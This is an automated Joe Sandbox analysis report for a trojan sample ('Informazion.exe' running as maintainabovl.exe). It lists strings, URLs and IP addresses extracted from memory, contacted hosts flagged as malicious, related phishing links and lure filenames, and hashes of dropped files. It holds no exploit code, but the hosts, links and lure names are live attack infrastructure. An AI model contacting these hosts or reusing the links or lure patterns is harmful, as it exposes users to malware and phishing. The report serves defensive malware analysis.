http://www.jiyu-kobo.co.jp/Y0/L	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.newtonsoft.com/json	maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comsivaz	maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://193.0.	maintainabovl.exe, 00000007.00000002.821094990.000000000166C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.galapagosdesign.com/staff/dennis.htm	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/6	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnr	maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://christianbeltran.co	maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/$	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/	maintainabovl.exe, 00000001.00000003.364771960.0000000005B78000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comF	maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/U	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comt	maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://en.wikipedia	maintainabovl.exe, 00000001.00000003.359298500.0000000005B62000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359272839.0000000005B63000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comrsivL	maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://en.w.	maintainabovl.exe, 00000001.00000003.359579923.0000000005B46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/q	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.coma6	maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn3	maintainabovl.exe, 00000001.00000003.360417576.0000000005B47000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360368772.0000000005B48000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comm	maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.newtonsoft.com/jsonschema	maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/-	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/g	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/h	maintainabovl.exe, 00000001.00000003.361885968.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361824750.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comkh	maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comM.TTF	maintainabovl.exe, 00000001.00000003.364079671.0000000005B48000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.363882229.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnved3	maintainabovl.exe, 00000001.00000003.360316834.0000000005B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.0.178.157	unknown	Russian Federation	202423	MGNHOST-ASRU	true
174.142.60.54	christianbeltran.co	Canada	32613	IWEB-ASCA	false
62.173.149.202	unknown	Russian Federation	34300	SPACENET-ASInternetServiceProviderRU	true
31.41.44.158	unknown	Russian Federation	56577	ASRELINKRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	782969
Start date and time:	2023-01-12 12:10:13 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Informazion.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/6@2/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 80.9% (good quality ratio 73.6%) Quality average: 75.2% Quality standard deviation: 32.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:11:51	API Interceptor	38x Sleep call for process: powershell.exe modified
12:12:36	API Interceptor	1x Sleep call for process: maintainabovl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
174.142.60.54	https://ehabhjf.r.af.d.sendibt2.com/tr/cl/RsZ_Xm0Xd6XcUhWRwpLePJN6Y3CC-03SCcMyued1sjAgBUDTIrUJ51gQ-uZ0FaDAVVfl5V8VpFhV_kkCwBvyH4QeE7q-rEp1DX2WT25KXcpgTqenItweVgIO2mGIcP4ulII5l_z_OSRFkPvyIotwc5f5-GzNFG4-xMi1wU7-8-cR7BMGChrbVPfnEk9VdObRNQxmrRHfIKXHgoTiaGryVI-TCKQB4xND55H9-VDabJZGr_4h9ssHRYU8aslCQzBsKnyygFTt_3os0xbxp9ttqAqOJ4fyUjFraPeac53_yqNUbnP4Pz2EnNEoC0kEuVD3CPqVXSmX4qPlmaRssR-TVoNzIaWAjL1ngiH2QlbKflIIlEOAF_zKa6egZWqtFNyuDSlWb96yjkiIPTqWlm3dr2WIVnl47s2891hFtCJ9NmGcs9i0recyINNuMRm9EwCL5GbF4Q6joOIsgCTp8MOFd1KTplIvHeSkl64lXl4gQhLi4i8252P5bSe3CfpJDnQKqnIx0EdLUSiEm06ntRQYFknT77bVv8uKuecXVfm0A0ZFCFK0_yyS0iO93prhTWTj-fRZXcMqFf0ZITHLScoefifGmmdEx9ujF5dyxVFzJ9qjUA	Get hash	malicious	Browse	xgo6mu.vinoentredosmontanas.com.co./favicon.ico
174.142.60.54	https://ehabhjf.r.bh.d.sendibt3.com/tr/cl/Xy7DZ1D2ux1mzJrPwKy4sjBaf4f8gnKsHeg1MBTyUUo9D8hodR7tckPrBUAMvGijMlXMldobzc56xqhGJcPrLFoJLzCRH-OA9XJm_Z7MnF-gfvnzTR6cPWRsLc_ieSzgjek3--S_CvyqrYNMfaUx847ApiacvaiNmXHR58HVcV_8rZo1DtO_HiKvTZ9WmTM-DRmrHVzTh-7Q7PXNnlFQ_FsgJ2n3qPTkxYNNEIyVdYfe7TCPT_oJSMySjZ2QKRwCOLb0P9KVWeBRFMmWVGSXs04O_0EkMQGVelGszhJVWnyl_QngW2Byp8t7O29loybHAJ7teczVphx7CuoK5yHtAdf-MiLzwZ6CZ2QjPVnXnouISxHutQo1Krto7aaQE5clI1rnCJl-R5ZWij7yfIFJQVNb06Pt13nAnvx4wLLmwAGnkdwdiUh7FsZBQDsjbj7bmH-eYHtdxNzNnBZIw8VXhpUNyTAxqoK79V6nETGs-0ZdWQzROswViAm_JhGvzHxUsKOCxZzAQANAVa2_DOUF-dqy-vtynG7uuuuboVrt64SHR5QMc2amQAsgbIUjet_xRJ0M9iA6sLV46kBppdo_YL5YBWg5McE3BRYVEWcdAkyEBDEiPzWof4486V2uuknwyVrQ0A	Get hash	malicious	Browse	xgo6mu.vinoentredosmontanas.com.co./favicon.ico
31.41.44.158	accounting_invoice_jhine.doc	Get hash	malicious	Browse	athinropro.ru/ls5/forum.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IWEB-ASCA	https://csecloud.ca/Adobe/december_attachment.zip	Get hash	malicious	Browse	64.15.158.7
	djlAewogvi.exe	Get hash	malicious	Browse	174.142.89.143
	kzih4ItIwW.exe	Get hash	malicious	Browse	174.142.89.143
	4X5gSZo58S.elf	Get hash	malicious	Browse	174.142.183.44
	Signedcontract-07826.docx.html	Get hash	malicious	Browse	64.15.136.71
	wMR47ZTdR2.exe	Get hash	malicious	Browse	174.142.89.143
	001436900461.AWB._INV_Declaration_New_20221104191623_162350.vbs	Get hash	malicious	Browse	174.142.89.143
	Purchase Order 105396 - 11.03.33.995.vbs	Get hash	malicious	Browse	174.142.89.143
	Allegato__CHIAM_SEMP_C_VAL_T_ME.vbs	Get hash	malicious	Browse	174.142.89.143
	Allegato_01.TIF_02.Tif _03.TIF_04.Tif_05_06.vbs	Get hash	malicious	Browse	174.142.89.143
	TZPvIZmNA3.elf	Get hash	malicious	Browse	70.38.180.22
	GlobalImagingDocuments1883095907976.vbs	Get hash	malicious	Browse	174.142.89.143
	https://www.lamarcug.org/CM.html	Get hash	malicious	Browse	70.38.120.60
	Purchase Invoice.xll	Get hash	malicious	Browse	174.141.233.136
	Packing List.xll	Get hash	malicious	Browse	174.141.233.136
	DHL-INVOICE-MBV.exe	Get hash	malicious	Browse	174.142.53.46
	hoteslagu.vbs	Get hash	malicious	Browse	174.142.89.143
	UPS-Address.eForm.html	Get hash	malicious	Browse	64.15.142.101
	http://mrpzvx.lantingcollege.edu.ph/#PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHBzOi8vTXJQenZYLmRpdnNpbmZvdGVjaC5jb20vP2U9YjJ4cGRtVnlMbVp2Y25SMWFXNUFjMlZoWTI5dExtTnZiUT09Ig==	Get hash	malicious	Browse	203.167.7.152
	SecuriteInfo.com.W32.Injector.EADG-7386.13303.exe	Get hash	malicious	Browse	184.107.11.4
MGNHOST-ASRU	47gcdr4nlI.exe	Get hash	malicious	Browse	185.142.98.118
	fx1sA5uEA6.dll	Get hash	malicious	Browse	45.128.184.132
	l86WZsZuFv.dll	Get hash	malicious	Browse	45.128.184.132
	ksbpxIpTBF.exe	Get hash	malicious	Browse	45.128.184.132
	sYYcKwk74U.exe	Get hash	malicious	Browse	45.128.184.132
	8cM8CHCI8G.exe	Get hash	malicious	Browse	45.128.184.132
	RhVUkWJKWL.exe	Get hash	malicious	Browse	45.128.184.132
	94nN5FYKPp.exe	Get hash	malicious	Browse	45.128.184.132
	5wh5H82cKl.exe	Get hash	malicious	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Browse	45.128.184.132
	status.dll	Get hash	malicious	Browse	45.128.184.132
	readme.dll	Get hash	malicious	Browse	45.128.184.132
	status.dll	Get hash	malicious	Browse	45.128.184.132
	IWmwEgXhMK.exe	Get hash	malicious	Browse	45.128.184.132
	book.exe	Get hash	malicious	Browse	45.128.184.132
	79MW1WhWul.exe	Get hash	malicious	Browse	45.128.184.132
	notepad.exe	Get hash	malicious	Browse	45.128.184.132
	notepad.exe	Get hash	malicious	Browse	45.128.184.132

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Requests.exe	Get hash	malicious	Browse	174.142.60.54
	SecuriteInfo.com.W32.MSIL_Kryptik.DWR.gen.Eldorado.16852.14916.exe	Get hash	malicious	Browse	174.142.60.54
	SecuriteInfo.com.Win64.RansomX-gen.7999.26557.exe	Get hash	malicious	Browse	174.142.60.54
	Madinat Jumeirah Living Asayel 14782(480).exe	Get hash	malicious	Browse	174.142.60.54
	SOA Payment TT application details.exe	Get hash	malicious	Browse	174.142.60.54
	DHL Receipt 122481117733.exe	Get hash	malicious	Browse	174.142.60.54
	file.exe	Get hash	malicious	Browse	174.142.60.54
	SecuriteInfo.com.Win32.MalwareX-gen.12564.26015.exe	Get hash	malicious	Browse	174.142.60.54
	SecuriteInfo.com.Win32.MalwareX-gen.27283.25061.exe	Get hash	malicious	Browse	174.142.60.54
	agenttesla.exe	Get hash	malicious	Browse	174.142.60.54
	PO.exe	Get hash	malicious	Browse	174.142.60.54
	https://us-west-2.protection.sophos.com/?d=sharepoint.com&u=aHR0cHM6Ly9ydWZ1c2FsZXhhbmRlcmx0ZC1teS5zaGFyZXBvaW50LmNvbS86bzovZy9wZXJzb25hbC9veXVzdWZfd3l6ZS1uZ19jb20vRXNFejhfYk9wdUJDcWQ0ZkF6UGhqbFFCRHJsNjZpQTV1V3ZhVEdNakM4czFfQT9lPTJtZnB6Mg==&i=NjFmNDY1MzljYmQ3ZmUxMDg2YjMzOWNm&t=SU5zKzNud1pqTkhXMFljaXJsU2owMGhBOTJwaWE1ZURtUUhSUnlMaC9uOD0=&h=6ce9d31a734f4c6698f5afc120287907&s=AVNPUEhUT0NFTkNSWVBUSVZDp3KifxaJ82Oo2eODtv-4kiGYCv4vs969xeHjnqsDPw	Get hash	malicious	Browse	174.142.60.54
	shedor2.2.exe	Get hash	malicious	Browse	174.142.60.54
	PO.exe	Get hash	malicious	Browse	174.142.60.54
	2mins27secs V0icemail from 03457 404.exe	Get hash	malicious	Browse	174.142.60.54
	gfds.exe	Get hash	malicious	Browse	174.142.60.54
	SecuriteInfo.com.Variant.Lazy.264199.25952.6770.exe	Get hash	malicious	Browse	174.142.60.54
	677809.exe	Get hash	malicious	Browse	174.142.60.54
	677809.exe	Get hash	malicious	Browse	174.142.60.54
	3rOyn65rNd.exe	Get hash	malicious	Browse	174.142.60.54

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\maintainabovl.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1537
Entropy (8bit):	5.3478589519339295
Encrypted:	false
SSDEEP:	48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNrqdq4qs
MD5:	F6D3657BD1FBEF54E7F7BACB2497E327
SHA1:	A0A712015C242DCC28B69CDF567F594627C9CFA0
SHA-256:	5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
SHA-512:	0231195A111259A3AA48526DCBEA98394099794C710C3FB8E0E12E2B4D30C60FB4064F7F4F671866FB0D94585E23B73C1270440242B25DA60CCFFA82B0B74306
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.902247628650607
Encrypted:	false
SSDEEP:	96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
MD5:	F948233D40FE29A0FFB67F9BB2F050B5
SHA1:	9A815D3F218A9374788F3ECF6BE3445F14B414D8
SHA-256:	C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
SHA-512:	FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	16488
Entropy (8bit):	5.546874985445841
Encrypted:	false
SSDEEP:	384:Pte/c0y/YV6Bl2lzN8MSBxAjyRiJ9gySJ3uzp1iZYv:bn32RNl4xAu1ycuzxv
MD5:	419626D0F61F36D9C94048612CECDDD9
SHA1:	51412557F0CB543375F9B6B39EF79185FD3D0C54
SHA-256:	8AE6B7AA70C27DAAF64A42CE2331121C8BA03C212921D83528E024F73250CBE3
SHA-512:	8C6678ADEF2F7546CB888BE7EC2AEEE395963BE01B9160A60CA38B00129B22EE7CD2F260B9DFAED713538A0C8DC2205924F56DEE51C46C2F210BC1DC066E25A2
Malicious:	false
Reputation:	low
